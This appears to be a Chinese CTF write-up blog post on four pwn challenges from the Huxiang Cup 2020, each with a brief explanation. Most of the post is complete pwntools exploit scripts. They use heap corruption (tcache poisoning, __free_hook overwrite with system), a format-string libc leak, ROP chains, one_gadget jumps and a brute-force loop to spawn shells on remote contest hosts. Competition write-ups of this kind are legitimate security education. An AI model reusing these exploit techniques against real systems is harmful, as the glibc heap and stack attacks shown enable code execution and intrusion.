湖湘杯2020

难受,缺氧了,连着三天打完后,身体受不了附件

babyheap

挺简单的堆

1
from pwn import*
2
def menu(ch):
3
	p.sendlineafter('>>',str(ch))
4
def new():
5
	menu(1)
6
def show(index):
7
	menu(2)
8
	p.sendlineafter('?',str(index))
9
def edit(index,size,content):
10
	menu(3)
11
	p.sendlineafter('?',str(index))
12
	p.sendlineafter(':',str(size))
13
	p.sendafter(':',content)
14
def free(index):
15
	menu(4)
16
	p.sendlineafter('?',str(index))
17
p = process('./main')
18
p = remote('47.111.104.169',57303)
19
libc =ELF('./libc-2.27.so')
20
for i in range(10):
21
	new()
22
for i in range(9,2,-1):
23
	free(i)
24
25
free(0)
26
free(1)
27
free(2)
28
29
for i in range(7):
30
	new()
31
new()
32
new()
33
new()
34
35
free(8)
36
37
for i in range(6):
38
	free(i)
39
free(7)
40
for i in range(6):
41
	new()
42
new() # 7 TARGET
43
edit(7,0xF8,'FMYY')
44
45
for i in range(7):
46
	free(i)
47
free(9)
48
49
for i in range(7):
50
	new()
51
new()
52
show(7)
53
54
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x10 - 0x60
55
log.info('LIBC:\t' + hex(libc_base))
56
free_hook = libc_base + libc.sym['__free_hook']
57
system = libc_base + libc.sym['system']
58
new() #9
59
60
for i in range(5):
61
	free(i)
62
free(7)
63
free(9)
64
65
new()
66
edit(0,0xF0,p64(free_hook))
67
new()
68
edit(1,0xF0,'/bin/sh')
69
new()
70
edit(2,0xF0,p64(system))
71
free(1)
72
p.interactive()

blend

异常的时候有个栈溢出,然后会跳回到main函数的结束位置,迁移到堆上执行ROP

1
from pwn import*
2
def menu(ch):
3
	p.sendlineafter('choice >',str(ch))
4
def show_name(index):
5
	menu(1)
6
def new(content):
7
	menu(2)
8
	p.sendafter('input note:',content)
9
def free(index):
10
	menu(3)
11
	p.sendlineafter('index>',str(index))
12
def show():
13
	menu(4)
14
def gift(content):
15
	menu(666)
16
	p.sendlineafter(':',content)
17
18
p = process('./main')
19
p = remote('47.111.104.99',51504)
20
libc =ELF('./libc-2.23.so')
21
p.sendlineafter(':','%11$p')
22
menu(1)
23
p.recvuntil('Current user:')
24
libc_base = int(p.recv(14),16) - libc.sym['__libc_start_main'] - 240
25
log.info('LIBC:\t' + hex(libc_base))
26
new('FMYY\n')
27
new('FMYY'*2*4 + p64(libc_base + 0x4527A) + '\n')
28
free(1)
29
free(0)
30
show()
31
p.recvuntil('index 1:')
32
heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0x1C80
33
log.info('HEAP:\t' + hex(heap_base))
34
gift('FMYY'*2*4 + p64(heap_base + 0x1C80 + 0x28)[0:7])
35
p.interactive()

pwn_Printf

非预期,按照Google CTF 的sprint逆向改的一个Pwn题,如果要逆出来,确实有点难度,但是可以直接跳过,最后就一个简单栈溢出

1
from pwn import*
2
p = process('./main')
3
p = remote('47.111.96.55',55106)
4
elf =ELF('./main')
5
libc =ELF('./libc-2.23.so')
6
for i in range(16):
7
	p.sendline('32')
8
pop_rdi_ret = 0x0000000000401213
9
payload =  p64(elf.got['read']) + p64(pop_rdi_ret) + p64(elf.got['read']) + p64(elf.plt['puts']) + p64(0x4007D4) + p64(elf.plt['puts'])
10
p.sendline(payload)
11
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['read']
12
log.info('LIBC:\t' + hex(libc_base))
13
14
payload = '\x00'*8 + p64(libc_base + 0xF1207)
15
p.sendline(payload)
16
p.interactive()

only_add

堆风水,直到比赛结束都没有布置出一个合理的堆结构,赛后花了两个小时成功构造出来,懒得再一步布置了,概率1/256爆破吧

1
from pwn import*
2
def menu(ch):
3
	p.sendlineafter('choice:',str(ch))
4
def realloc(size,content):
5
	menu(1)
6
	p.sendlineafter('Size:',str(size))
7
	p.sendafter('Data:',content)
8
def free():
9
	menu(1)
10
	p.sendlineafter('Size:',str(0))
11
def R(size,content):
12
	p.sendline('1')
13
	sleep(0.1)
14
	p.sendline(str(size))
15
	sleep(0.1)
16
	p.send(content)
17
	sleep(0.1)
18
def F():
19
	p.sendline('1')
20
	sleep(0.1)
21
	p.sendline('0')
22
	sleep(0.1)
23
libc =ELF('./libc-2.27.so')
24
while True:
25
	p = process('./main')
26
	try:
27
		realloc(0x18,'FMYY')
28
		free()
29
		realloc(0x4F0,'FMYY')
30
		realloc(0x4F0 - 0x80,'FMYY')
31
		free()
32
		realloc(0xF0,'FMYY')
33
		free()
34
		realloc(0x100,'FMYY')
35
		realloc(0x28,'FMYY')
36
		free()
37
		realloc(0x48,'FMYY')
38
		free()
39
		realloc(0x110,'FMYY')
40
		realloc(0x38,'FMYY')
41
		free()
42
		#######
43
		realloc(0x58,'FMYY')
44
		free()
45
		realloc(0x68,'FMYY')
46
		free()
47
		realloc(0x58,'\x00'*0x58 + '\xF1')
48
		free()
49
		realloc(0x68,'FMYY')
50
		free()
51
		realloc(0x500,'FMYY')
52
		free()
53
		realloc(0xE0,'\x00'*0x68 + p64(0x31) + '\x60\x67')
54
		free()
55
		#####
56
		realloc(0x48,'\x00'*0x48 + '\xC1')
57
		free()
58
		realloc(0x38,'FMYY')
59
		free()
60
		realloc(0xB0,'\x00'*0x38 + p64(0xE1) + '\xD0\x96')
61
		free()
62
		realloc(0xD0,'FMYY')
63
		realloc(0x70,'FMYY')
64
		free()
65
		realloc(0xD0,'FMYY')
66
		realloc(0x70,'FMYY')
67
		free()
68
69
		realloc(0xD0,p64(0xFBAD1800) + '\x00'*0x18 + '\xC8')
70
		libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_']
71
		log.info('LIBC:\t' + hex(libc_base))
72
		if libc_base < 0x7F0000000000:
73
			p.close()
74
			continue
75
		menu(2)
76
		R(0x80,'FMYY')
77
		F()
78
		R(0x90,'FMYY')
79
		F()
80
		R(0xA0,'FMYY')
81
		F()
82
		R(0x88,'\x00'*0x88 + '\xD1')
83
		F()
84
		R(0x90,'FMYY')
85
		F()
86
		R(0xC0,'\x00'*0x98 + p64(0xB1) + p64(libc_base + libc.sym['__free_hook']))
87
		F()
88
		R(0xA0,'FMYY')
89
		R(0x60,'FMYY')
90
		F()
91
		R(0xA0,p64(libc_base + 0x10A45C))
92
		F()
93
		break
94
	except:
95
		p.close()
96
		continue
97
p.interactive()
Contents
  1. 1. babyheap
  2. 2. blend
  3. 3. pwn_Printf
  4. 4. only_add
|